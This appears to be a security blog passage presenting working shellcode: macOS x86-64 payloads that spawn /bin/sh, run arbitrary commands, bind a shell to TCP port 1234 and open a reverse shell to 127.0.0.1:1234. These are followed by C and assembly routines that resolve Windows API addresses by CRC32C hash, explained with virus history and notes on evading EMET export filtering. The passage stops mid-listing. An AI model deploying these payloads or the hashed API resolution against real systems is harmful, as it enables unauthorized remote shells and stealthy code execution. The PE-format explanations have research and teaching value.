Shellcode: Mac OSX x86-64

Introduction

Since Mac OSX is derived from BSD sources, I wrongly presumed the BSD codes would work without problem. 0x4d_, who has a Mac, confirmed they did not work, and we quickly realized the fix was simply to set bit 25 of the EAX register, for example with the BTS (Bit Test and Set) instruction.

; Set bit 25 of EAX, i.e. OR in 0x02000000 (syscall class 2 shifted left by 24).
    bts  eax, 25

You can set alternatively using ROL/ROR/SHL.

Apple does it their way

System calls in OSX follow the AMD64 ABI except for one minor difference. The upper 8 bits of the EAX register (bits 24–31) represent the “class” of system call as described by Dustin Schultz in Mac OS X 64 Bit Assembly System Calls.

Mac OS X or likely BSD has split up the system call numbers into several different “classes.” The upper order bits of the syscall number represent the class of the system call, in the case of write and exit, it’s SYSCALL_CLASS_UNIX and hence the upper order bits are 2! Thus, every Unix system call will be (0x2000000 + unix syscall #).

The main difference between system calls on Mac OSX and BSD (which OSX is derived from) is the class. As you can see defined in syscall_sw.h

/*
 * Syscall classes for 64-bit system call entry.
 * For 64-bit users, the 32-bit syscall number is partitioned
 * with the high-order bits representing the class and low-order
 * bits being the syscall number within that class.
 * The high-order 32-bits of the 64-bit syscall number are unused.
 * All system classes enter the kernel via the syscall instruction.
 *
 * These are not #ifdef'd for x86-64 because they might be used for
 * 32-bit someday and so the 64-bit comm page in a 32-bit kernel
 * can use them.
 */
/* The class occupies bits 24..31; the syscall number occupies bits 0..23. */
#define SYSCALL_CLASS_SHIFT	24
#define SYSCALL_CLASS_MASK	(0xFF << SYSCALL_CLASS_SHIFT)
#define SYSCALL_NUMBER_MASK	(~SYSCALL_CLASS_MASK)

/* Class values; shifted left by SYSCALL_CLASS_SHIFT, UNIX (2) becomes 0x02000000. */
#define SYSCALL_CLASS_NONE	0	/* Invalid */
#define SYSCALL_CLASS_MACH	1	/* Mach */	
#define SYSCALL_CLASS_UNIX	2	/* Unix/BSD */
#define SYSCALL_CLASS_MDEP	3	/* Machine-dependent */
#define SYSCALL_CLASS_DIAG	4	/* Diagnostics */

So when constructing a system call, they use the following macro defined in same header file.

/*
 * Build a full Unix-class syscall number: class 2 in bits 24..31 combined
 * with the syscall number masked to bits 0..23.
 * Example: SYSCALL_CONSTRUCT_UNIX(59) == 0x0200003B.
 */
#define SYSCALL_CONSTRUCT_UNIX(syscall_number) \
    ((SYSCALL_CLASS_UNIX << SYSCALL_CLASS_SHIFT) | \
     (SYSCALL_NUMBER_MASK & (syscall_number)))

Spawn /bin/sh

; 26 bytes execute /bin/sh
;
; Mac OSX x86-64: execve("/bin//sh", NULL, NULL)
; The path string is built on the stack, so the listing needs no data section.
;
    bits    64

    xor     esi, esi         ; esi = 0 (second argument, argv = NULL)
    mul     esi              ; eax = 0, edx = 0 (third argument, envp = NULL)
    bts     eax, 25          ; eax = 0x02000000
    mov     al, 59           ; rax = sys_execve
    mov     rbx, '/bin//sh'  ; exactly 8 characters, so the path fills one qword
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; rdi="/bin//sh", 0
    syscall

Execute command

; 43 bytes execute command
;
; Mac OSX x86-64: execve("/bin//sh", {"/bin//sh", "-c", cmd, NULL}, NULL)
; The command string must be placed directly after the final CALL: the CALL
; pushes the address of the byte that follows it, and that address becomes
; argv[2].
;
    bits    64

    push    59
    pop     rax         ; eax = sys_execve
    cdq                 ; edx = 0
    bts     eax, 25     ; eax = 0x0200003B
    mov     rbx, '/bin//sh'
    push    rdx         ; 0
    push    rbx         ; "/bin//sh"
    push    rsp
    pop     rdi         ; rdi="/bin//sh", 0
    ; ---------
    push    rdx         ; 0
    push    word '-c'   ; 2-byte push: rsp is no longer 8-byte aligned after this
    push    rsp
    pop     rbx         ; rbx="-c", 0
    push    rdx         ; argv[3]=NULL
    jmp     l_cmd64     ; jump forward so the CALL below can push the command address
r_cmd64:                ; argv[2]=cmd
    push    rbx         ; argv[1]="-c"
    push    rdi         ; argv[0]="/bin//sh"
    push    rsp
    pop     rsi         ; rsi=argv
    syscall             ; rdx is still 0 here, so envp = NULL
l_cmd64:
    call    r_cmd64     ; pushes the address of the command string that follows
    ; put your command here followed by null terminator

Bind port to shell

; 91 bytes bind shell
;
; Mac OSX x86-64: listen on TCP port 1234, accept one connection, duplicate
; the accepted descriptor onto 0, 1 and 2, then execve /bin//sh.
;
; rbp holds 0x02000000 for the whole listing; it is copied into rax before
; each syscall so that only the low byte (the syscall number) has to be loaded.
; No return value is checked for errors.
;
    bits 64
    
    mov     eax, ~0xd2040200 & 0xFFFFFFFF  ; stored inverted: the immediate 0x2dfbfdff has no zero bytes
    not     eax              ; eax = 0xd2040200, upper half of rax = 0
    push    rax              ; bytes on stack: 00 02 04 D2 00 00 00 00 (family 2, port 0x04D2 = 1234, address 0)
    
    xor     ebp, ebp
    bts     ebp, 25          ; rbp = 0x02000000
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax              ; rax = 0x02000000
    cdq                      ; rdx = IPPROTO_IP
    push    1
    pop     rsi              ; rsi = SOCK_STREAM
    push    2
    pop     rdi              ; rdi = AF_INET   
    mov     al, 97           ; eax = sys_socket
    syscall
    
    xchg    eax, edi         ; edi=s
    xchg    eax, ebx         ; ebx=2
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    ; Only 8 bytes of the address were pushed; the remaining 8 of the 16 passed
    ; as the length are whatever already lies above them on the stack.
    push    rbp
    pop     rax
    push    rsp
    pop     rsi              ; rsi = address of the qword pushed at the top
    mov     dl, 16           ; NOTE(review): rdx = 16 only if rdx is still 0 after the socket syscall - confirm
    mov     al, 104
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    rax
    pop     rsi              ; rsi = return value of bind, 0 is assumed (success)
    push    rbp
    pop     rax    
    mov     al, 106
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    ; rsi is not reloaded: it is expected to still hold the 0 set for listen.
    push    rbp
    pop     rax    
    mov     al, 30
    cdq                      ; edx = 0 (eax = 0x0200001E is non-negative)
    syscall
    
    xchg    eax, edi         ; edi=r
    push    rbx              ; rsi=2
    pop     rsi
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, FILENO_STDIN)
    ; dup2(r, FILENO_STDOUT)
    ; dup2(r, FILENO_STDERR)
    ; The loop counts esi down 2, 1, 0 and exits when it reaches -1.
dup_loop64:
    push    rbp
    pop     rax
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed   
    
    ; step 6, execute /bin/sh
    ; execve("/bin//sh", {"/bin//sh", NULL}, 0);
    ; NOTE(review): the code below passes rsi = 0, i.e. argv = NULL, not the
    ; two-element array the line above describes.
    xor     esi, esi 
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    ; ---------
    push    rbp
    pop     rax    
    mov     al, 59           ; rax=sys_execve
    syscall

Reverse connect shell

; 79 byte reverse shell
;
; Mac OSX x86-64: create a TCP socket, duplicate it onto descriptors 0, 1
; and 2, connect to 127.0.0.1:1234, then execve /bin//sh.
;
; rbp holds 0x02000000 for the whole listing; it is copied into rax before
; each syscall so that only the low byte (the syscall number) has to be loaded.
; No return value is checked for errors.
;
    bits    64

    mov     rcx, ~0x0100007fd2040200  ; stored inverted: the immediate has no zero bytes
    not     rcx              ; rcx = 0x0100007fd2040200
    push    rcx              ; bytes on stack: 00 02 04 D2 7F 00 00 01 (family 2, port 1234, 127.0.0.1)
    
    xor     ebp, ebp
    bts     ebp, 25          ; rbp = 0x02000000
    ; step 1, create a socket
    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    push    rbp
    pop     rax
    cdq                      ; rdx=IPPROTO_IP
    push    1
    pop     rsi              ; rsi=SOCK_STREAM
    push    2
    pop     rdi              ; rdi=AF_INET  
    mov     al, 97
    syscall
    
    xchg    eax, edi         ; edi=s
    xchg    eax, esi         ; esi=2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2(s, FILENO_STDIN)
    ; dup2(s, FILENO_STDOUT)
    ; dup2(s, FILENO_STDERR)
    ; The loop counts esi down 2, 1, 0 and exits when it reaches -1.
dup_loop64:
    push    rbp
    pop     rax              ; eax = 0x02000000 
    mov     al, 90           ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (sockfd, {AF_INET,1234,127.0.0.1}, 16);
    ; Only 8 bytes of the address were pushed; the remaining 8 of the 16 passed
    ; as the length are whatever already lies above them on the stack.
    push    rbp
    pop     rax
    push    rsp
    pop     rsi              ; rsi = address of the qword pushed at the top
    mov     dl, 16           ; rdx=sizeof(sa)  NOTE(review): assumes rdx is still 0 after the previous syscalls - confirm
    mov     al, 98           ; rax=sys_connect
    syscall    
    
    ; step 4, execute /bin/sh
    ; execve("/bin//sh", NULL, 0);
    push    rax
    pop     rsi              ; rsi = return value of connect, 0 is assumed (success)
    push    rbp
    pop     rax
    cdq                      ; rdx=0
    mov     rbx, '/bin//sh'
    push    rdx              ; 0
    push    rbx              ; "/bin//sh"
    push    rsp
    pop     rdi              ; "/bin//sh", 0
    mov     al, 59           ; rax=sys_execve
    syscall

Sources

See here but bear in mind the x86 code hasn’t been tested.

Thanks to 0x4d_ for helping fix problems with initial codes.

Posted in assembly, osx, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Resolving API addresses in memory

Introduction

A basic but core function of all Position Independent Code (PIC) for windows is to resolve the address of API functions at runtime. It’s an important task with a number of options available. Here, we’ll examine 2 popular methods using the Import Address Table (IAT) and Export Address Table (EAT) which are by far the most stable. (for this kind of code)

Since the release of Windows Vista in 2007, Address space layout randomization (ASLR) is enabled for executables and dynamic link libraries specifically linked to be ASLR-enabled which mitigates exploitation of vulnerabilities.

But even long before ASLR arrived, virus writers over 20 years ago faced a similar problem with the unintentional “randomization” of the base address for kernel32.dll.

The first Windows virus called Bizatch was written by Quantum/VLAD on a beta copy of Windows 95. The virus used hardcoded API and as a result simply crashed on versions of windows that had a different base address for kernel32.dll.

Mr. Sandman, Jacky Qwerty and GriYo discussed “the kernel32 problem” and “the GetModuleHandle solution” in PE infection under Win32 and weren’t aware of the Process Environment Block (PEB) under NT at the time which was discussed later by Ratter in Gaining important datas from PEB under NT boxes..

Jacky Qwerty published A GetProcAddress-alike utility which initially became a “standard” method of resolving API addresses in viruses.

At some point after this, authors started resolving the API by CRC32 checksum, presumably to hide strings of API in their code and also to reduce space.

LethalMind showed in 1999 a way to resolve API using his own checksum in Retrieving API Addresses. Then of course LSD group proposed in 2002 their own ARX based algorithm in WIN32 Assembly components (shellcodes) which was the basis for many win32 shellcodes that followed.

That’s just a brief (potentially inaccurate) historical context of where most of the basic ideas for resolving API came from. Today of course, there are many more advanced challenges to overcome when exploiting vulnerabilities but they are largely related to protection mechanisms and not what I’ll discuss here.

All the structures displayed here can be found in WinNT.h from the Microsoft SDK which should be included with MSVC if you have it installed.

You can find detailed description of PE/PE+ format in pecoff.docx

Image DOS Header

At the start of every PE file we find an MS-DOS executable or a “stub” that makes any PE file a valid MS-DOS executable.

The only field we need here is e_lfanew which, when added to the current base address of the module, gives us a pointer to IMAGE_NT_HEADERS.

// DOS .EXE header
// Located at the very start of a mapped PE image. With the field sizes below,
// e_lfanew sits at byte offset 0x3C (30 WORDs precede it).
typedef struct _IMAGE_DOS_HEADER {      
    WORD   e_magic;     // Magic number
    WORD   e_cblp;      // Bytes on last page of file
    WORD   e_cp;        // Pages in file
    WORD   e_crlc;      // Relocations
    WORD   e_cparhdr;   // Size of header in paragraphs
    WORD   e_minalloc;  // Minimum extra paragraphs needed
    WORD   e_maxalloc;  // Maximum extra paragraphs needed
    WORD   e_ss;        // Initial (relative) SS value
    WORD   e_sp;        // Initial SP value
    WORD   e_csum;      // Checksum
    WORD   e_ip;        // Initial IP value
    WORD   e_cs;        // Initial (relative) CS value
    WORD   e_lfarlc;    // File address of relocation table
    WORD   e_ovno;      // Overlay number
    WORD   e_res[4];    // Reserved words
    WORD   e_oemid;     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;   // OEM information; e_oemid specific
    WORD   e_res2[10];  // Reserved words
    LONG   e_lfanew;    // File address of new exe header (offset of the NT headers from the image base)
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

Image NT Headers

Because the base address for mapped PE image in memory can be “random”, only the Relative Virtual Address (RVA) of important structures are saved in PE file.

To convert a RVA to Virtual Address (VA) we can use the following macro.

// Convert a Relative Virtual Address into a value of `type` by adding it to
// the module base address.
//   type - result type of the expression (pointer or integer type)
//   base - base address of the mapped module
//   rva  - offset relative to base
// Each argument and the whole expansion are parenthesized so that compound
// expressions (e.g. `p + 1` or `c ? a : b`) can be passed, and so the result
// can be used inside a larger expression, without precedence surprises.
#define RVA2VA(type, base, rva) ((type)((ULONG_PTR)(base) + (rva)))

Once we add e_lfanew to the base address, we then have a pointer to IMAGE_NT_HEADERS.

The following 2 structures are defined in WinNT.h but only one is used depending on architecture C code is compiled for.

We’re interested in the OptionalHeader field which contains among other things information about import and export directories.

// 64-bit variant: identical layout except for the optional header type.
typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;  // holds the data directories
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

// 32-bit variant (note the struct tag carries no "32" suffix, the typedef does).
typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;  // holds the data directories
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Image Optional Header

At the end of Optional Header is an array of IMAGE_DATA_DIRECTORY structures.

// Directory Entries
// Indexes into the DataDirectory array at the end of the optional header.

#define IMAGE_DIRECTORY_ENTRY_EXPORT 0   // Export Directory
#define IMAGE_DIRECTORY_ENTRY_IMPORT 1   // Import Directory
//
// Optional header format.
//
// This is the 32-bit layout. With the field sizes below, DataDirectory
// starts at byte offset 0x60 within the structure.
//

typedef struct _IMAGE_OPTIONAL_HEADER {
  //
  // Standard fields.
  //

  WORD    Magic;
  BYTE    MajorLinkerVersion;
  BYTE    MinorLinkerVersion;
  DWORD   SizeOfCode;
  DWORD   SizeOfInitializedData;
  DWORD   SizeOfUninitializedData;
  DWORD   AddressOfEntryPoint;
  DWORD   BaseOfCode;
  DWORD   BaseOfData;

  //
  // NT additional fields.
  //

  DWORD   ImageBase;
  DWORD   SectionAlignment;
  DWORD   FileAlignment;
  WORD    MajorOperatingSystemVersion;
  WORD    MinorOperatingSystemVersion;
  WORD    MajorImageVersion;
  WORD    MinorImageVersion;
  WORD    MajorSubsystemVersion;
  WORD    MinorSubsystemVersion;
  DWORD   Win32VersionValue;
  DWORD   SizeOfImage;
  DWORD   SizeOfHeaders;
  DWORD   CheckSum;
  WORD    Subsystem;
  WORD    DllCharacteristics;
  DWORD   SizeOfStackReserve;
  DWORD   SizeOfStackCommit;
  DWORD   SizeOfHeapReserve;
  DWORD   SizeOfHeapCommit;
  DWORD   LoaderFlags;
  DWORD   NumberOfRvaAndSizes;
// Entry 0 describes the export directory, entry 1 the import directory.
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;

Image Data Directory

Each directory holds the RVA and size of a directory. To access the export or import directory, simply add the VirtualAddress field (which, despite its name, is an RVA) to the base using the RVA2VA macro.

//
// Directory format.
//
// One 8-byte entry per directory; an RVA of 0 means the directory is absent
// (this is how the search functions in this article test for it).
//

typedef struct _IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;  // RVA of the directory data, relative to the image base
    DWORD   Size;            // size of that data in bytes
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

// Number of entries in the optional header's DataDirectory array.
#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
  • VirtualAddress
  • RVA of the data structure. For example, if this structure is for import symbols, this field contains the RVA of the IMAGE_IMPORT_DESCRIPTOR array.

  • Size
  • Contains the size in bytes of the data structure referred to by VirtualAddress.

Image Export Directory

Since exports are first in the list of directories, let’s examine this method of retrieval.

//
// Export Format
//
// Byte offsets are noted for the fields that the assembly version of the
// export search reads directly.
//

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;                   // +0Ch RVA of the DLL name string
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;          // +18h number of entries in the name and ordinal arrays
    DWORD   AddressOfFunctions;     // +1Ch RVA from base of image
    DWORD   AddressOfNames;         // +20h RVA from base of image
    DWORD   AddressOfNameOrdinals;  // +24h RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

We’re interested in 5 fields.

  • Name
  • RVA of a string for DLL name.

  • NumberOfNames
  • The number of exported API by name.

  • AddressOfFunctions
  • RVA to array of RVAs. When each RVA is added to base address of module, they will give us the address of an exported API.

  • AddressOfNames
  • RVA to array of RVAs. When each RVA is added to base address of module, it will give us the address of a null terminated string representing an exported API.

  • AddressOfNameOrdinals
  • RVA to array of ordinals. Each ordinal represents an index in AddressOfFunctions array.

The following function will retrieve an API address from the export table using CRC-32C of DLL and API name.

base parameter is obviously base address of DLL and hash is derived from the addition of 2 CRC-32C hashes. crc32c(DLL string) + crc32c(API string).

// Resolve an exported function by hash from a module's export table.
//
//   base - base address of the mapped module to search
//   hash - crc32c(DLL name from the export directory) + crc32c(API name)
//
// Returns the address of the matching export, or NULL when the module has no
// export directory, exports nothing by name, has no matching name, or the
// matching entry is a forwarder.
//
// Exports are not resolved by ordinal, and forwarders are not followed.
LPVOID search_exp(LPVOID base, DWORD hash)
{
  PIMAGE_DOS_HEADER       dos;
  PIMAGE_NT_HEADERS       nt;
  PIMAGE_DATA_DIRECTORY   dir;
  PIMAGE_EXPORT_DIRECTORY exp;
  DWORD                   cnt, rva, size, fn_rva, dll_h;
  PDWORD                  adr;
  PDWORD                  sym;
  PWORD                   ord;
  PCHAR                   api, dll;

  dos  = (PIMAGE_DOS_HEADER)base;
  nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
  dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
  rva  = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
  size = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;

  // if no export table, return NULL
  if (rva == 0) return NULL;

  exp = RVA2VA(PIMAGE_EXPORT_DIRECTORY, base, rva);
  cnt = exp->NumberOfNames;

  // if no api exported by name, return NULL
  if (cnt == 0) return NULL;

  adr = RVA2VA(PDWORD, base, exp->AddressOfFunctions);
  sym = RVA2VA(PDWORD, base, exp->AddressOfNames);
  ord = RVA2VA(PWORD,  base, exp->AddressOfNameOrdinals);
  dll = RVA2VA(PCHAR,  base, exp->Name);

  // calculate hash of DLL string once; it is the same for every export
  dll_h = crc32c(dll);

  // walk the name table from the last entry down to the first
  while (cnt--) {
    api = RVA2VA(PCHAR, base, sym[cnt]);

    // add API hash to DLL hash and compare
    if (crc32c(api) + dll_h != hash) continue;

    // sym[] and ord[] are parallel arrays; ord[] indexes adr[]
    if (ord[cnt] >= exp->NumberOfFunctions) return NULL;
    fn_rva = adr[ord[cnt]];

    // An RVA that points back inside the export directory is a forwarder
    // string ("OTHERDLL.Function"), not code, so it must not be returned
    // as a callable address.
    if (fn_rva >= rva && fn_rva < rva + size) return NULL;

    return RVA2VA(LPVOID, base, fn_rva);
  }
  return NULL;
}

One important thing to mention is that this function does not resolve API by ordinal nor does it resolve forward references which can sometimes be a problem.

Here’s some assembly to perform the same thing.

; search_expx - resolve an API address from a module's export table (x86, 32-bit)
;
; in:  ebx = base of module to search
;      ecx = hash to find
;
; out: eax = api address resolved in EAT
;            (0 if there is no export directory, no names, or no match)
;
; _eax, _ecx and _edx are defined outside this listing; they are used as
; offsets of the saved registers within the PUSHAD frame.
; NOTE(review): the saved-EDX slot is used as scratch for the DLL hash, so
; after POPAD edx appears to hold that hash rather than the caller's value -
; confirm against the definition of _edx.
;
search_expx:
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]

    ; first directory is export
    ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
    ; (the hash passed in ecx stays available in the PUSHAD frame)
    mov    ecx, [ebx+eax+78h]
    jecxz  exp_l2      ; no export directory: exit with ecx = 0

    ; eax = crc32c(IMAGE_EXPORT_DIRECTORY.Name)
    mov    eax, [ebx+ecx+0ch]
    add    eax, ebx
    call   crc32c
    mov    [esp+_edx], eax  ; keep DLL hash in the saved-EDX slot

    ; esi = address of IMAGE_EXPORT_DIRECTORY.NumberOfNames
    lea    esi, [ebx+ecx+18h]
    push   4
    pop    ecx         ; load 4 RVA
    ; The first dword read is NumberOfNames, a count and not an RVA; the base
    ; added to it here is subtracted again after the pops below.
exp_l0:
    lodsd              ; load RVA
    add    eax, ebx    ; eax = RVA2VA(ebx, eax)
    push   eax         ; save VA
    loop   exp_l0

    pop    edi          ; edi = AddressOfNameOrdinals
    pop    edx          ; edx = AddressOfNames
    pop    esi          ; esi = AddressOfFunctions
    pop    ecx          ; ecx = NumberOfNames

    sub    ecx, ebx     ; ecx = VA2RVA(NumberOfNames, base)
    jz     exp_l2       ; exit if no api
    ; Scan the name table from the last entry towards the first.
exp_l3:
    mov    eax, [edx+4*ecx-4] ; get RVA of API string
    add    eax, ebx           ; eax = RVA2VA(eax, ebx)
    call   crc32c             ; generate crc32 of api string
    add    eax, [esp+_edx]    ; add crc32 of DLL string

    cmp    eax, [esp+_ecx]    ; found match?
    loopne exp_l3             ; --ecx && eax != hash
    jne    exp_l2             ; exit if not found (ecx is 0 here)

    ; Match: loopne has already decremented ecx, so ecx is the index of the
    ; matching name.
    xchg   eax, ebx           ; eax = base
    xchg   eax, ecx           ; eax = name index, ecx = base

    movzx  eax, word [edi+2*eax] ; eax = AddressOfNameOrdinals[eax]
    add    ecx, [esi+4*eax] ; ecx = base + AddressOfFunctions[eax]
exp_l2:
    mov    [esp+_eax], ecx  ; result is returned in eax by popad
    popad
    ret

So that’s the basic method to search through exports. Now for the imports which is a little trickier.

Image Import Descriptor

The release of Enhanced Mitigation Experience Toolkit (EMET) by Microsoft in 2009 broke some existing shellcodes that searched the export directory for API.

EMET includes Export Address Table Access Filtering (EAF) and EAF+ since the release of 5.2, both of which serve to block read attempts of the export and import directories originating from modules commonly used to probe memory during the exploitation of vulnerabilities.

Typically, a shellcode using the IAT will resolve addresses for GetModuleHandle and GetProcAddress before resolving the rest by string.

If a PE file imports API from other modules, the import directory will contain an array of image import descriptors, each one representing a module.

// One descriptor per imported module; the array is terminated by a null
// descriptor. With the field sizes below each descriptor is 20 bytes:
// OriginalFirstThunk +00h, TimeDateStamp +04h, ForwarderChain +08h,
// Name +0Ch, FirstThunk +10h.
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
  union {
    DWORD Characteristics; // 0 for terminating null import descriptor
    DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
  } DUMMYUNIONNAME;
  DWORD TimeDateStamp;        // 0 if not bound,
                              // -1 if bound, and real date\time stamp
                              //  in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
                              // O.W. date/time stamp of DLL bound to (Old BIND)

  DWORD ForwarderChain;       // -1 if no forwarders
  DWORD Name;                 // RVA of the null terminated module name
  DWORD FirstThunk;           // RVA to IAT (if bound this IAT has actual addresses)
} IMAGE_IMPORT_DESCRIPTOR;
typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR;

The 3 fields we’re interested in are:

  • OriginalFirstThunk
  • Contains offsets to the names of the imported functions.

  • Name
  • Null terminated string of the module to import API from.

  • FirstThunk
  • Contains offsets to the actual addresses of the functions.

Image Thunk Data

Each descriptor contains RVA that points to array of Image Thunk Data structures. Each entry represents information about the imported API.

// One entry per imported API; all four members share the same DWORD.
// Which member is meaningful depends on which array the entry belongs to
// (OriginalFirstThunk or FirstThunk) and on whether the import is by ordinal.
typedef struct _IMAGE_THUNK_DATA32 {
    union {
        DWORD ForwarderString;      // PBYTE 
        DWORD Function;             // PDWORD
        DWORD Ordinal;
        DWORD AddressOfData;        // PIMAGE_IMPORT_BY_NAME
    } u1;
} IMAGE_THUNK_DATA32;
typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32;

In the code, I skip entries that are imported by ordinal.

The AddressOfData from OriginalFirstThunk is an RVA that points to an IMPORT_BY_NAME structure.

The Function field from FirstThunk points to actual address of API function we’re searching for.

Import By Name

Since we’re not importing by ordinal, we don’t care about the hint field, just the name which is null terminated API string.

// Hint/name pair for an import by name; the name starts 2 bytes into the
// structure, immediately after the WORD hint.
typedef struct _IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    BYTE    Name[1];    // first byte of a null terminated, variable-length string
} IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME;
  • Hint
  • Contains an index into the export table of the DLL the function resides in. This field is for use by the PE loader so it can look up the function in the DLL’s export table quickly. This value is not essential and some linkers may set the value in this field to 0.

  • Name
  • Contains the name of the import function. The name is an ASCIIZ string. Note that Name’s size is defined as byte but it’s really a variable-sized field. It’s just that there is no way to represent a variable-sized field in a structure. The structure is provided so that you can refer to the data structure with descriptive names.

The following code will search import address table for API address using CRC-32C hash of DLL and API strings.

// Resolve an imported function by hash from a module's import table.
//
//   base - base address of the mapped module whose imports are searched
//   hash - crc32c(DLL name from the import descriptor) + crc32c(API name)
//
// Returns the address stored in the matching FirstThunk (IAT) slot, or NULL
// when the module has no import directory or no import matches.
//
// Imports by ordinal are skipped. Descriptors without an OriginalFirstThunk
// array are skipped as well, because that array is the only place the import
// names are read from.
LPVOID search_imp(LPVOID base, DWORD hash)
{
  DWORD                    dll_h, i, rva;
  PIMAGE_IMPORT_DESCRIPTOR imp;
  PIMAGE_THUNK_DATA        oft, ft;
  PIMAGE_IMPORT_BY_NAME    ibn;
  PIMAGE_DOS_HEADER        dos;
  PIMAGE_NT_HEADERS        nt;
  PIMAGE_DATA_DIRECTORY    dir;

  dos = (PIMAGE_DOS_HEADER)base;
  nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
  dir = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
  rva = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

  // if no import table, return
  if (rva == 0) return NULL;

  imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, base, rva);

  // a descriptor with Name == 0 terminates the array
  for (i = 0; imp[i].Name != 0; i++)
  {
    rva = imp[i].OriginalFirstThunk;

    // Without a name table, RVA2VA would yield `base` itself and the loop
    // below would walk the DOS header as if it were a thunk array.
    if (rva == 0) continue;

    oft   = RVA2VA(PIMAGE_THUNK_DATA, base, rva);
    rva   = imp[i].FirstThunk;
    ft    = RVA2VA(PIMAGE_THUNK_DATA, base, rva);
    dll_h = crc32c(RVA2VA(PCHAR, base, imp[i].Name));

    // oft and ft are parallel arrays, terminated by a zero entry
    for (; oft->u1.Ordinal != 0; oft++, ft++)
    {
      // skip import by ordinal
      if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;

      rva = oft->u1.AddressOfData;
      ibn = RVA2VA(PIMAGE_IMPORT_BY_NAME, base, rva);

      if ((crc32c((const char *)ibn->Name) + dll_h) == hash) {
        return (LPVOID)ft->u1.Function;
      }
    }
  }
  return NULL;
}

The assembly follows the same algorithm as above but with some optimizations.

; search_impx - resolve an API address from a module's import table (x86, 32-bit)
;
; in: ebx = base of module to search
;     ecx = hash to find
;
; out: eax = api address resolved in IAT
;            (0 if there is no import directory or no match)
;
; _eax, _ecx and _edx are defined outside this listing; they are used as
; offsets of the saved registers within the PUSHAD frame.
; NOTE(review): the saved-EDX slot is used as scratch for the DLL hash, so
; after POPAD edx appears to hold that hash rather than the caller's value -
; confirm against the definition of _edx.
;
search_impx:
    xor    eax, eax    ; api_adr = NULL
    pushad
    ; eax = IMAGE_DOS_HEADER.e_lfanew
    mov    eax, [ebx+3ch]
    add    eax, 8     ; add 8 for import directory

    ; eax = IMAGE_DATA_DIRECTORY.VirtualAddress
    mov    eax, [ebx+eax+78h]
    test   eax, eax
    jz     imp_l2      ; no import directory: return 0

    lea    ebp, [eax+ebx] ; ebp = first import descriptor
imp_l0:
    mov    esi, ebp      ; esi = current descriptor
    lodsd                ; OriginalFirstThunk +00h
    xchg   eax, edx      ; temporarily store in edx
    lodsd                ; TimeDateStamp      +04h
    lodsd                ; ForwarderChain     +08h
    lodsd                ; Name               +0Ch
    test   eax, eax
    jz     imp_l2        ; if (Name == 0) goto imp_l2;

    add    eax, ebx
    call   crc32c
    mov    [esp+_edx], eax  ; keep DLL hash in the saved-EDX slot

    lodsd                 ; FirstThunk
    mov    ebp, esi       ; ebp = next descriptor

    lea    esi, [edx+ebx] ; esi = OriginalFirstThunk + base
    lea    edi, [eax+ebx] ; edi = FirstThunk + base
imp_l1:
    lodsd                 ; eax = oft->u1.Function, oft++;
    scasd                 ; ft++; (used only to advance edi, its flags are overwritten by the test below)
